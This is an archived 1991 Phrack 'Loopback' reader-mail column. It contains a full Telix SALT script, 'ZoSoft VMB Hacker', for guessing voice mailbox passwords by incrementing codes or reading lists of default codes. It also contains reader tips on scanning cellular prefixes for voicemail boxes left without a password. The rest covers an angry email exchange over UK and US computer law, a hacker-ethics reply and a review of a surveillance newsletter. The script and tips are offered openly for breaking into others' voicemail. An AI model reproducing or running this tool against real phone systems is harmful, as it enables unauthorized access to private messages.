💾 Archived View for aphrack.org › issues › phrack35 › 2.gmi captured on 2021-12-03 at 14:04:38. Gemini links have been rewritten to link to archived content
-=-=-=-=-=-=-
==Phrack Inc.== Volume Three, Issue Thirty-five, File 2 of 13 [-=:< Phrack Loopback >:=-] By Phrack Staff Phrack Loopback is a forum for you, the reader, to ask questions, air problems, and talk about what ever topic you would like to discuss. This is also the place The Phrack Staff will make suggestions to you by reviewing various items of note; magazines, software, catalogs, hardware, etc. ______________________________________________________________________________ What's on Your Mind ~~~~~~~~~~~~~~~~~~ :: Hacking VMB's :: From: Mr. Upsetter To: phracksub@stormking.com Subject: Phrack 34 VMB article The article in Phrack 34 on voice mail hacking by Night Ranger was really good. It reminded me of some experiences I had with a cellular voice mail system a couple years ago in San Diego. I would bet there are similar systems in other cities. These VMB's would automatically answer calls when the subscriber wasn't on the air. They worked just like standard VMB's. To access the box, the owner could dial his or her own cellular number, then hit * when it answered. Then the VMB would ask for a password. Guess what the default password was? None! That meant all you had to do was dial up a cellular VMB and hit *, and you were in. How many VMB's still had the default password? About half... To scan for cellular VMB's all you had to do was dial numbers in the cellular prefix. It was pretty fun...almost too easy. Cheers, Mr. Upsetter - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >From: Zoso Puda > >After reading PHRACK 34 I thought it was good. Especially the article on VMB >hacking. As a matter of fact I wrote a SALT script to help me do it. This is exactly what we like to see. People actually getting basic information and building on it. - - - - - - - - - - - - - - - - - - - - - - - - - - - +-------------------------------------+ | ZoSoft Telix VMB Hacker | | | | written by: Zoso Puda | +-------------------------------------+ First words ----------- After reading Night Ranger's article (see PHRACK 34), I decided to make a VMB hacking program. Night Ranger provided good insight into how to hack VMB systems but some VMBs are hard to crack. What I came up with is a program to help me hack some of the harder systems. The ones that don't use the defaults are tough. Also my phone has the buttons and earpiece in one unit and I had to dial then put the phone to my ear and listen, look at the buttons to dial a number and put the phone back to my ear to listen. It soon became tiresome. What I finally came up with was a program to let me run all the phone functions from the keyboard. My modem speaker is loud enough to hear clearly so it seemed like the perfect thing to do. I also automated certain features like incrementing the password or box number. The program is not fully automated however. You must run this program manually. It's main purpose is to allow you to run normal phone functions via the keyboard. If you cannot hear clearly through your modem speaker then pick up the phone after the program dials the VMB phone # and hang up the phone before hanging up the modem. What follows is a brief description on how to use the program, compile the program, and run the program. A working knowledge of VMB systems is expected. Parameter details ----------------- VMB phone number : If you don't know this, give it up. Setup sequence : This code is used for systems that require a '9' or '#' or '*' to be pressed before the box number. Up to 3 characters can be in this string. Valid Box # : This would be a known valid box or the box you will be attempting to hack. This value remains constant. Codefile filename: You may use a file to get 'default' or your favorite passwords from. You must include the extension. Starting box/code: Box # or code to start checking. This value will increase automatically upon pressing [F7]. Using the function keys ----------------------- [F1] Dials the VMB system (see params). [F2] Hangs-up the modem. [F3] Closes the current codefile.(see params). [F4] Lets you set the current code/box #. [F5] Dials the Setup sequence (see params). [F6] Dials the current code. [F7] Makes the next code current. [F8] Dials the valid box (see params). [F9] Allows you to re-set the parameters. [F10] Hangs-up and quits the program. [0 - 9] These keys will dial 0 - 9 respectively. [*, #] These keys will dial * and #. [/] Used as a substitute # for the keypad. Basic Insructions ----------------- Codefiles should be stored in the same directory as your Telix program. A sample codefile should look like this: 1111 2222 3333 etc... I suggest you make seperate codefiles for the number of digits in each code. For example, all 3 digit codes should be in a file called 3DIGIT.COD, or something similar. During parameter entry, if you enter a codefile and it exists, you will NOT be prompted for a 'Starting box/code'. When the codefile is finished, the current code will set itself to 1000. If you enter a blank for the codefile or the name you entered doesn't exist then you will be prompted for a 'Starting Box/Code'. Compiling --------- Save the program within the 'CUT HERE' lines as VMBHACK.SLT. Copy the file VMBHACK.SLT into the directory where your Telix scripts are. Compile using CS.EXE. (example: CS VMBHACK.SLT) To run the program, load Telix and press Alt-G followed by the program name (VMBHACK). //---------------------------<CUT HERE>------------------------------------- // ZoSoft VMB Hacker Version 1.4 // Code by: Zoso, November 1991 // // See PHRACK 34 for more information on VMB systems. // // NOTE: Do not remove the credits of the original author, modified versions // you may add credits, but please do not remove any. // str code[10], // Global Variables codes[10], reset[1], vmb_number[15], borc[1], valid[10], setup[3]; str filename[12], fstatus[10]; int f; int fflag = 0; init_modem() // Modem initialization { cputs("AT X3 S6=0 S7=0 S11=105 M1 L3"); // X must be 3, L is Loudness on cputs("^M"); // some modems, you may have to waitfor("OK",20); // alter this. See you modem manual. } vmb_dial(str string) // Dial function { str workstr[20]; workstr = string; strcat(workstr,";"); cputs("ATDT"); cputs(workstr); cputs("^M"); cputs("^M"); } hang_up() // Hang Up function { hangup(); waitfor("",20); cputs("ATH0"); cputs("^M"); cputs("^M"); clear_scr(); display(); } next_code() // Next code function { int cd; if (fflag) { if (not feof(f)) // Check for file first { fgets(code,10,f); return; } if (feof(f)) { file_close(); code = "999"; goto NEXTCODE; } } NEXTCODE: cd = stoi(code); cd = cd + 1; // This line determines how the code itos(cd,code); // gets incremented. } set_code() // Enter new code { gotoxy(65,2); gets(code,10); } parameters() // Set parameters { str c[1]; file_close(); GETINFO: clear_scr(); printsc("VMB Hacker Parameters^M^J"); printsc("^M^JVMB phone number :"); gets(vmb_number,15); printsc("^M^JSetup sequence :"); gets(setup,3); printsc("^M^JValid box # :"); gets(valid,10); printsc("^M^JCodefile filename :"); gets(filename,12); if (filename != "") { open_file(); next_code(); } if (not fflag) { filename = "N/A"; printsc("^M^JStarting box/code :"); gets(code,10); } printsc("^M^J^M^JCorrect? (Y/n):"); gets(c,1); if (c == "n" || c == "N") goto GETINFO; } press_enter() // Pause routine { str a[1]; pstraxy("Press [ENTER] to continue...",20,23,11); gets(a,1); } title_scr() // Title screen { str i[1]; TITLE: clear_scr(); pstraxy(" - ZoSoft VMB Hacker V1.4 -",20,4,11); pstraxy("written for Telix by: Zoso Puda",20,6,14); press_enter(); } display() // Display screen { box(0,0,78,3,4,0,19); box(0,0,78,5,4,0,19); pstraxy("[ ZoSoft VMB Hacker V1.4 ]",25,0,31); pstraxy("VMB Number:",4,2,31); // Information display pstraxy(vmb_number,16,2,27); pstraxy("Valid #:",33,2,31); pstraxy(valid,42,2,27); pstraxy("Current:",57,2,31); pstraxy(code,66,2,27); pstraxy("Codefile:",6,4,31); pstraxy(filename,16,4,27); pstraxy("File status:",29,4,31); pstraxy(fstatus,42,4,27); pstraxy("Setup sequence:",50,4,31); pstraxy(setup,66,4,27); box(0,6,78,10,4,0,103); // Function key display pstraxy("[ ]",30,6,111); pstraxy(" 0 - 9,*,#",31,6,110); pstraxy("[ ] Dial VMB", 2,7,111); pstraxy("F1", 3,7,110); pstraxy("[ ] Hang up",22,7,111); pstraxy("F2",23,7,110); pstraxy("[ ] Close file",42,7,111); pstraxy("F3",43,7,110); pstraxy("[ ] Set Current",61,7,111); pstraxy("F4",62,7,110); pstraxy("[ ] Setup seq.",2,8,111); pstraxy("F5", 3,8,110); pstraxy("[ ] Dial current",22,8,111); pstraxy("F6",23,8,110); pstraxy("[ ] Next box/code",42,8,111); pstraxy("F7",43,8,110); pstraxy("[ ] Valid box",61,8,111); pstraxy("F8",62,8,110); pstraxy("[ ] Parameters",22,9,111); pstraxy("F9",23,9,110); pstraxy("[ ] QUIT",41,9,111); pstraxy("F10",42,9,110); gotoxy(0,11); } quit_vmb() // End program { file_close(); hangup(); waitfor("",20); clear_scr(); printsc("Thanks for using ZoSoft's VMB Hacker.^M^J^M^J"); cputs_tr(_mdm_init_str); // Restore modem params } open_file() // Open Codefile { fflag = 1; f = fopen(filename,"r"); fstatus = "OPEN"; if (ferror(f)) file_close(); } file_close() // Close Codefile { fflag = 0; fclose(f); fstatus = "CLOSED"; } main() // MAIN program module { int chr; title_scr(); parameters(); clear_scr(); display(); init_modem(); TOP: gotoxy(0,11); chr = inkeyw(); if (chr == '0') vmb_dial("0"); // Dial 0-9 if (chr == '1') vmb_dial("1"); if (chr == '2') vmb_dial("2"); if (chr == '3') vmb_dial("3"); if (chr == '4') vmb_dial("4"); if (chr == '5') vmb_dial("5"); if (chr == '6') vmb_dial("6"); if (chr == '7') vmb_dial("7"); if (chr == '8') vmb_dial("8"); if (chr == '9') vmb_dial("9"); if (chr == '#') vmb_dial("#"); // Pound sign (#) if (chr == '/') vmb_dial("#"); // Make (/) same as (#) for keypad if (chr == '*') vmb_dial("*"); // Asterisk (*) if (chr == 15104) // F1 vmb_dial(vmb_number); if (chr == 15360) // F2 hang_up(); if (chr == 15616) // F3 { file_close(); display(); } if (chr == 15872) // F4 { set_code(); display(); } if (chr == 16128) // F5 vmb_dial(setup); if (chr == 16384) // F6 vmb_dial(code); if (chr == 16640) // F7 { next_code(); display(); } if (chr == 16896) // F8 vmb_dial(valid); if (chr == 17152) // F9 { hang_up(); parameters(); display(); } if (chr == 17408) // F10 { quit_vmb(); goto END; } goto TOP; END: prints("^M^J"); } //---------------------------<CUT HERE>--------------------- ______________________________________________________________________________ :: More Legal Stuff :: >From: "Michael Lawrie, Operations" <MICHAEL@hicom.loughborough.ac.uk> >Subject: RE: Who/What is this? > >In this country, the receipt of documents like this would probably be >pretty helpful in sending a person down on a conspiracy to contravene >a section or more of the Computer Misuse Act, I do not appreciate crap >like this appearing on my machine but since you didn't send it me, I >can't really moan at you - What I would appreciate though is if you >told people that forwarding it to people who don't want it is probably >not a good idea, unless you want all your list members locked up in >some pokey British gaol that is! > >Michael Lawrie. >--- >Michael Lawrie, Hicom Group Security <security@uk.ac.lut.hicom> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sir, You will have to excuse my ignorance of telecom laws in other countries. In the United States, distribution of technical information such as Phrack Inc. is protected by law. Hackers are not involved in conspiracies or plots. Most hackers could care less about politics. Hackers are interested in the progression of technology and learning about how our advanced society works. The inefficient structure known as government is the last thing most hackers are interested in exploring. Phrack Inc. has no "membership." Phrack Inc. is an electronically distributed publication. It is like any other security oriented newsletter. Have you ever heard of "Computer Security Journal", "Computers and Security", or "Computer Crime Digest?" These are some of the "security industry" publications that are read in the U.S. Phrack Inc. merely has a little different flavor to it. If you are interested in seeing any of these printed journals, I can forward their address to you. I am sorry if you received Phrack Inc. and didn't wish to read it. You might wish to take the matter up with the person that forwarded it to you. I hope it wasn't too big of an inconvenience for you to delete the mail message containing Phrack Inc. Cheers, Dispater - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - After a (as it turns out not so private) conversation with Torq, it seems this guy isn't even an admin anywhere. He just likes to pretend he is. Did my reply end this little debate? NOT! This person had the nerve to intercept my private mail to Torq and then proceeded to bitch about it some more. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >From MICHAEL@hicom.loughborough.ac.uk Sat Nov 9 09:45:53 1991 Date: Fri, 8 Nov 91 13:19 GMT From: "Michael Lawrie, Operations" <MICHAEL@hicom.loughborough.ac.uk> To: PHRACKSUB <<@nsfnet-relay.ac.uk:PHRACKSUB@STORMKING.com>> Subject: The EFF. I found the following message the other day, whilst routing around, I am to assume you lied to me about taking him off the list but for now we'll forget that. > From phrack@gnu.ai.mit.edu Wed Oct 23 01:41:51 1991 > Date: Wed, 23 Oct 91 01:41:47 -0400 > From: phracksub@stormking.com > Message-Id: <::::::::::::::::::::::> > To: torq@::::::::::::::: > Subject: Phrack > > This guy sounds like a total idiot. If he does kill your account or something > stupid, get a hold of the EFF. They went to bat for someone who had their > account revoked because he/she had issues of Phrack on their directory. > > people should get a clue.... > > Dispater > phracksub@stormking.com As you say, people should get a clue. Are you assuming that 'torq' is perhaps American and as such has his rights protected by constitution? He isn't, he is British and doesn't really as such have much going for him. If I want to kill his account I can do it at the bat of an eyelid, whilst him receiving 'Phrack' is not breaking any laws because it does not show intent, it would be breaking my machine's regulations if it came here. I would enjoy the EFF to come 'to bat' for Torq if I revoke his account for having issues of Phrack in his directory, Its a shame he hasn't. Does the EFF have any good lawyers in the UK that you know of? Regards... Michael. --- Michael Lawrie, Operations Group, Systems Development and Security. Mail: michael@uk.ac.lut.hicom (Span:19527::60478::lorry) [What pretentious signature?] (Inet: lorry@mit.edu) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - From: Dispater To: MICHAEL@hicom.loughborough.ac.uk I never said I would delete him from the distribution list. I don't have to DO anything. Who the hell are you pretending to be anyway? You aren't the admin of MIT's gnu machine. >I found the following message the other day, whilst routing around, I am to >assume you lied to me about taking him off the list but for now we'll forget >that. Really? What the hell were you doing prowling though someone else's mail? I assume you did it without Torq's permission. I wonder if MIT would like to hear that some British hacker is rummaging around their machine? Your "finding" of our private e-mail might place you in criminal violation of the Electronic Communications Privacy Act of 1986. This is a federal law in the United States which protects the privacy of electronic communications. Your interception of our communications has violated our privacy. How would you like me to have a little chat with YOUR supervisor? Why you care about what takes place on the MIT computer which is located here in the USA? In this country freedom of speech is a right granted to all its citizens. The previous publisher of Phrack had to go to Federal Court to prove it and he succeeded. Phrack Inc. is 100% legal here and there is not one damn thing you can do about it! Dispater ______________________________________________________________________________ :: Hacker Philosophy :: From: The Dark Lord Sarik Malthus Organization: Underground Computing Foundation > I'm curious...now, don't think I am trying to judge you, or your > actions, or anything...but I am wondering how you, in your mind, justify the > actions of hackers and the kind of information provided by your magazine? I don't. I think people spend too much time attempting to justify their "morality." I don't play that guilt trip. I only seek information. Information has no morality. It is simple and pure, just like truth. I do feel that with knowledge comes responsibility not to use it in a destructive way. This is why I will not print "how to make bomb" files in Phrack Inc. Explosives are made for one thing and it doesn't involve too much creativity. People can get that type of stuff elsewhere. I have never damaged any system or hurt any individual financially. Carding is unquestionable robbery. If you know the person you are carding from, that is revenge and is a different category, as far as I am concerned, but it still doesn't make it right. Besides, any poser with half a brain can pull a CBI. That doesn't demonstrate much talent to me. I admit I went through the c0deZ phase, but I moved onto better things. I guess your basic question may boil down to, "Why hack?" I see the internet and the telecom world in as the latest frontier to be explored. If you look back at how this country started, you will see that it was explored by people who probably had a similar mentality to that of hackers. We want to test ourselves. We want to have a broad range of different experiences in our lives. We are not content with ignorance of the unknown. And, to some extent we are sick of our current society's norms. With that in mind we leave the security of what is considered acceptable at times. I guess I have a lot of different unpopular views....oh well. _______________________________________________________________________________ A Review of: ~~~~~~~~~~ Full Disclosure #23 - a publication For Truth, Justice, and The American Way ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Full Disclosure Subscription Rates: P.O. Box 903-FD23 U.S - 12 issues for $18.00 Libertyville IL 60048 24 issues for $29.95 No Canadian orders, please! by:Twisted Pair About a month ago I mailed in a coupon I got from friend in order to get a sample issue of Full Disclosure. Within a week I received Issue #23. It's got articles on fax interception, dumpster diving, computer security tips, surveillance tips, technical stuff, mail surveillance, etc. The Fax Interception article was most interesting to me. I've often wondered just how easy it could be to intercept faxes. Its all explained in the article. Here's some text from the article: | False Sense of Security: | | With the widespread proliferation of fax machines came increased use. | In general, a document transferred has been given the same sort of | validity as one sent or received by the U.S. Mail.* In general, such | communications were originally secure. Now that interception equipment is | available, the | sense of security has become false.